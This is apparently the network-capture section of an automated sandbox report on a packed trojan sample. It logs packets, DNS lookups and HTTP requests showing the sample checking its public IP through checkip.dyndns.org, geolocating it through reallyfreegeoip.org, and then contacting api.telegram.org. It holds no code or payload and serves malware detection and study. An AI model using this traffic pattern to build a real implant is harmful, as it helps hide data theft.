Sep 25, 2024 21:54:25.242976904 CEST	443	49712	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:25.244807005 CEST	49712	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:25.244827986 CEST	443	49712	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:25.392757893 CEST	443	49712	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:25.392873049 CEST	443	49712	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:25.392949104 CEST	49712	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:25.393439054 CEST	49712	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:25.397064924 CEST	49711	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:25.397897005 CEST	49713	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:25.402817965 CEST	80	49713	193.122.6.168	192.168.2.7
Sep 25, 2024 21:54:25.402973890 CEST	49713	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:25.403053045 CEST	49713	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:25.408005953 CEST	80	49713	193.122.6.168	192.168.2.7
Sep 25, 2024 21:54:25.411324024 CEST	80	49711	193.122.6.168	192.168.2.7
Sep 25, 2024 21:54:25.411397934 CEST	49711	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:26.040602922 CEST	80	49713	193.122.6.168	192.168.2.7
Sep 25, 2024 21:54:26.041795969 CEST	49714	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:26.041861057 CEST	443	49714	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:26.041939020 CEST	49714	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:26.042184114 CEST	49714	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:26.042207003 CEST	443	49714	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:26.084721088 CEST	49713	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:26.518495083 CEST	443	49714	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:26.520159960 CEST	49714	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:26.520196915 CEST	443	49714	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:26.664233923 CEST	443	49714	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:26.664340973 CEST	443	49714	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:26.664410114 CEST	49714	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:26.664952040 CEST	49714	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:26.668107033 CEST	49713	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:26.668821096 CEST	49715	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:26.673384905 CEST	80	49713	193.122.6.168	192.168.2.7
Sep 25, 2024 21:54:26.673518896 CEST	49713	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:26.673898935 CEST	80	49715	193.122.6.168	192.168.2.7
Sep 25, 2024 21:54:26.673988104 CEST	49715	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:26.674101114 CEST	49715	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:26.678952932 CEST	80	49715	193.122.6.168	192.168.2.7
Sep 25, 2024 21:54:27.474567890 CEST	80	49715	193.122.6.168	192.168.2.7
Sep 25, 2024 21:54:27.475986004 CEST	49716	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:27.476046085 CEST	443	49716	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:27.476111889 CEST	49716	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:27.476344109 CEST	49716	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:27.476356030 CEST	443	49716	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:27.521532059 CEST	49715	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:27.954691887 CEST	443	49716	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:27.956971884 CEST	49716	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:27.957000017 CEST	443	49716	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:28.112307072 CEST	443	49716	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:28.112406969 CEST	443	49716	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:28.112514973 CEST	49716	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:28.113224030 CEST	49716	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:28.116915941 CEST	49715	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:28.118225098 CEST	49717	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:28.124094963 CEST	80	49715	193.122.6.168	192.168.2.7
Sep 25, 2024 21:54:28.124174118 CEST	49715	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:28.125006914 CEST	80	49717	193.122.6.168	192.168.2.7
Sep 25, 2024 21:54:28.125089884 CEST	49717	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:28.125169039 CEST	49717	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:28.131098032 CEST	80	49717	193.122.6.168	192.168.2.7
Sep 25, 2024 21:54:28.756685972 CEST	80	49717	193.122.6.168	192.168.2.7
Sep 25, 2024 21:54:28.758390903 CEST	49718	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:28.758467913 CEST	443	49718	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:28.758544922 CEST	49718	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:28.758865118 CEST	49718	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:28.758882999 CEST	443	49718	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:28.803415060 CEST	49717	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:29.216527939 CEST	443	49718	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:29.226427078 CEST	49718	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:29.226474047 CEST	443	49718	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:29.345521927 CEST	443	49718	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:29.345639944 CEST	443	49718	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:29.345793009 CEST	49718	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:29.346467018 CEST	49718	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:29.350182056 CEST	49717	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:29.351500988 CEST	49719	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:29.355263948 CEST	80	49717	193.122.6.168	192.168.2.7
Sep 25, 2024 21:54:29.355345011 CEST	49717	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:29.356337070 CEST	80	49719	193.122.6.168	192.168.2.7
Sep 25, 2024 21:54:29.356426001 CEST	49719	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:29.356527090 CEST	49719	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:29.361352921 CEST	80	49719	193.122.6.168	192.168.2.7
Sep 25, 2024 21:54:30.004937887 CEST	80	49719	193.122.6.168	192.168.2.7
Sep 25, 2024 21:54:30.006433964 CEST	49720	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:30.006488085 CEST	443	49720	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:30.006571054 CEST	49720	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:30.006917953 CEST	49720	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:30.006932020 CEST	443	49720	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:30.053402901 CEST	49719	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:30.466841936 CEST	443	49720	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:30.468799114 CEST	49720	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:30.468859911 CEST	443	49720	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:30.600327015 CEST	443	49720	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:30.600426912 CEST	443	49720	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:30.600497007 CEST	49720	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:30.601066113 CEST	49720	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:30.603840113 CEST	49719	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:30.604882002 CEST	49721	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:30.609066963 CEST	80	49719	193.122.6.168	192.168.2.7
Sep 25, 2024 21:54:30.609162092 CEST	49719	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:30.609776974 CEST	80	49721	193.122.6.168	192.168.2.7
Sep 25, 2024 21:54:30.609860897 CEST	49721	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:30.609955072 CEST	49721	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:30.614748001 CEST	80	49721	193.122.6.168	192.168.2.7
Sep 25, 2024 21:54:31.239100933 CEST	80	49721	193.122.6.168	192.168.2.7
Sep 25, 2024 21:54:31.240577936 CEST	49722	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:31.240632057 CEST	443	49722	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:31.240714073 CEST	49722	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:31.241125107 CEST	49722	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:31.241142988 CEST	443	49722	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:31.287811995 CEST	49721	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:31.697062016 CEST	443	49722	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:31.713974953 CEST	49722	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:31.713994026 CEST	443	49722	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:31.873064041 CEST	443	49722	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:31.873205900 CEST	443	49722	188.114.97.3	192.168.2.7
Sep 25, 2024 21:54:31.873297930 CEST	49722	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:31.873867035 CEST	49722	443	192.168.2.7	188.114.97.3
Sep 25, 2024 21:54:31.894761086 CEST	49721	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:31.902209044 CEST	80	49721	193.122.6.168	192.168.2.7
Sep 25, 2024 21:54:31.902322054 CEST	49721	80	192.168.2.7	193.122.6.168
Sep 25, 2024 21:54:31.904587984 CEST	49723	443	192.168.2.7	149.154.167.220
Sep 25, 2024 21:54:31.904634953 CEST	443	49723	149.154.167.220	192.168.2.7
Sep 25, 2024 21:54:31.904709101 CEST	49723	443	192.168.2.7	149.154.167.220
Sep 25, 2024 21:54:31.905103922 CEST	49723	443	192.168.2.7	149.154.167.220
Sep 25, 2024 21:54:31.905117989 CEST	443	49723	149.154.167.220	192.168.2.7
Sep 25, 2024 21:54:32.553936958 CEST	443	49723	149.154.167.220	192.168.2.7
Sep 25, 2024 21:54:32.554145098 CEST	49723	443	192.168.2.7	149.154.167.220
Sep 25, 2024 21:54:32.555808067 CEST	49723	443	192.168.2.7	149.154.167.220
Sep 25, 2024 21:54:32.555828094 CEST	443	49723	149.154.167.220	192.168.2.7
Sep 25, 2024 21:54:32.556180954 CEST	443	49723	149.154.167.220	192.168.2.7
Sep 25, 2024 21:54:32.557873964 CEST	49723	443	192.168.2.7	149.154.167.220
Sep 25, 2024 21:54:32.603405952 CEST	443	49723	149.154.167.220	192.168.2.7
Sep 25, 2024 21:54:32.797548056 CEST	443	49723	149.154.167.220	192.168.2.7
Sep 25, 2024 21:54:32.797629118 CEST	443	49723	149.154.167.220	192.168.2.7
Sep 25, 2024 21:54:32.797725916 CEST	49723	443	192.168.2.7	149.154.167.220
Sep 25, 2024 21:54:32.802014112 CEST	49723	443	192.168.2.7	149.154.167.220
Sep 25, 2024 21:54:47.246373892 CEST	49708	80	192.168.2.7	193.122.6.168

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 25, 2024 21:54:11.786007881 CEST	57947	53	192.168.2.7	1.1.1.1
Sep 25, 2024 21:54:19.796638966 CEST	54014	53	192.168.2.7	1.1.1.1
Sep 25, 2024 21:54:19.804934025 CEST	53	54014	1.1.1.1	192.168.2.7
Sep 25, 2024 21:54:21.012043953 CEST	55946	53	192.168.2.7	1.1.1.1
Sep 25, 2024 21:54:21.020836115 CEST	53	55946	1.1.1.1	192.168.2.7
Sep 25, 2024 21:54:31.893029928 CEST	59966	53	192.168.2.7	1.1.1.1
Sep 25, 2024 21:54:31.902935028 CEST	53	59966	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 25, 2024 21:54:11.786007881 CEST	192.168.2.7	1.1.1.1	0x6f05	Standard query (0)	time.windows.com	A (IP address)	IN (0x0001)	false
Sep 25, 2024 21:54:19.796638966 CEST	192.168.2.7	1.1.1.1	0x4bcf	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Sep 25, 2024 21:54:21.012043953 CEST	192.168.2.7	1.1.1.1	0xcb80	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Sep 25, 2024 21:54:31.893029928 CEST	192.168.2.7	1.1.1.1	0xed43	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 25, 2024 21:54:11.794054985 CEST	1.1.1.1	192.168.2.7	0x6f05	No error (0)	time.windows.com	twc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Sep 25, 2024 21:54:19.804934025 CEST	1.1.1.1	192.168.2.7	0x4bcf	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 25, 2024 21:54:19.804934025 CEST	1.1.1.1	192.168.2.7	0x4bcf	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Sep 25, 2024 21:54:19.804934025 CEST	1.1.1.1	192.168.2.7	0x4bcf	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Sep 25, 2024 21:54:19.804934025 CEST	1.1.1.1	192.168.2.7	0x4bcf	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Sep 25, 2024 21:54:19.804934025 CEST	1.1.1.1	192.168.2.7	0x4bcf	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Sep 25, 2024 21:54:19.804934025 CEST	1.1.1.1	192.168.2.7	0x4bcf	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Sep 25, 2024 21:54:21.020836115 CEST	1.1.1.1	192.168.2.7	0xcb80	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 25, 2024 21:54:21.020836115 CEST	1.1.1.1	192.168.2.7	0xcb80	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 25, 2024 21:54:31.902935028 CEST	1.1.1.1	192.168.2.7	0xed43	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49703	193.122.6.168	80	7600	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 21:54:19.816318035 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 25, 2024 21:54:20.751400948 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 19:54:20 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 035103d8a947690295354535ff37dfe3 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 25, 2024 21:54:20.755733967 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 25, 2024 21:54:20.968812943 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 19:54:20 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 3a0db541cd244583f5b2365b387ec372 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 25, 2024 21:54:21.729464054 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 25, 2024 21:54:22.004311085 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 19:54:21 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ce3407c94d4da8ef28cc31d592694d47 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49708	193.122.6.168	80	7600	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 21:54:22.626214981 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 25, 2024 21:54:23.499480963 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 19:54:23 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a64b2b212a25b3780f45fe7a02679b24 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49711	193.122.6.168	80	7600	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 21:54:24.140626907 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 25, 2024 21:54:24.776884079 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 19:54:24 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 63d1afdc023e8222205ac281be0d82fc Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49713	193.122.6.168	80	7600	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 21:54:25.403053045 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 25, 2024 21:54:26.040602922 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 19:54:25 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 545b1eb107295c99312e359946840579 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49715	193.122.6.168	80	7600	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 21:54:26.674101114 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 25, 2024 21:54:27.474567890 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 19:54:27 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5758825cf5560ea2b45571b27d6748f3 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49717	193.122.6.168	80	7600	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 21:54:28.125169039 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 25, 2024 21:54:28.756685972 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 19:54:28 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f96db00dad8063612596ebbaf091ddb5 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49719	193.122.6.168	80	7600	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 21:54:29.356527090 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 25, 2024 21:54:30.004937887 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 19:54:29 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 8080de224a3b8cb5c7d2d5905eaa0fbc Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49721	193.122.6.168	80	7600	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 21:54:30.609955072 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 25, 2024 21:54:31.239100933 CEST	320	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 19:54:31 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 01c31a311cf4f635ee76985150e38b12 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49705	188.114.97.3	443	7600	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-25 19:54:21 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
